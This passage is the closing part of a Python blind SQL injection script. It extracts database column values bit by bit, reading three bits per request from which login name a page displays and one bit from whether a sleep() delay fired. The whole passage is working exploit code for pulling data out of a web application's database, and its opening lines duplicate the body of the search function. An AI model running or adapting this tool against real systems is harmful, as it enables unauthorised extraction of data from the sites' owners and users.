    started = time.time()
    respond = requests.get(url + payload)
    elapsed = time.time() - started

    shown_name = re.findall(rp, respond.text)[0]
    three_bits = getIndex(state_list, shown_name) - 1
    delay_bit = 1 if elapsed > 4 else 0
    return [three_bits, delay_bit]


def search(cn, tn, i, co, ci):
    """Send one value-extraction probe and decode it into [three_bit_value, delay_bit].

    Args:
        cn: column name, substituted for @0 in sql_search.
        tn: table name, substituted for @4 (the FROM target).
        i: 1-based position of the character being probed.
        co: right shift applied before masking the 3-bit group (main() uses 0 or 3).
        ci: index of the single bit read through the sleep() delay (main() uses 6 or 7).

    Returns:
        A two-element list: the 3-bit group as an int (position of the displayed
        login name in state_list, minus one) and 1 if the response took more
        than 4 s (the sleep fired), else 0.

    Raises:
        IndexError: if no "Login name" line is found in the response.

    Side effects: prints and increments the module-level request counter rc.
    """
    global rc
    substitutions = (
        ('@0', cn),
        ('@4', tn),
        ('@1', str(i)),
        ('@2', str(co)),
        ('@3', str(ci)),
    )
    payload = sql_search
    for marker, text in substitutions:
        payload = payload.replace(marker, text)

    print('[!]第{:d}次请求......'.format(rc))
    rc += 1
    started = time.time()
    respond = requests.get(url + payload)
    elapsed = time.time() - started

    shown_name = re.findall(rp, respond.text)[0]
    three_bits = getIndex(state_list, shown_name) - 1
    delay_bit = 1 if elapsed > 4 else 0
    return [three_bits, delay_bit]


def getIndex(bl, value):
    """Return the index of the first element of bl equal to value, or -1 if none matches."""
    return next((idx for idx, element in enumerate(bl) if element == value), -1)


if __name__ == '__main__':
    # Run the interactive driver only when executed directly, not on import.
    main()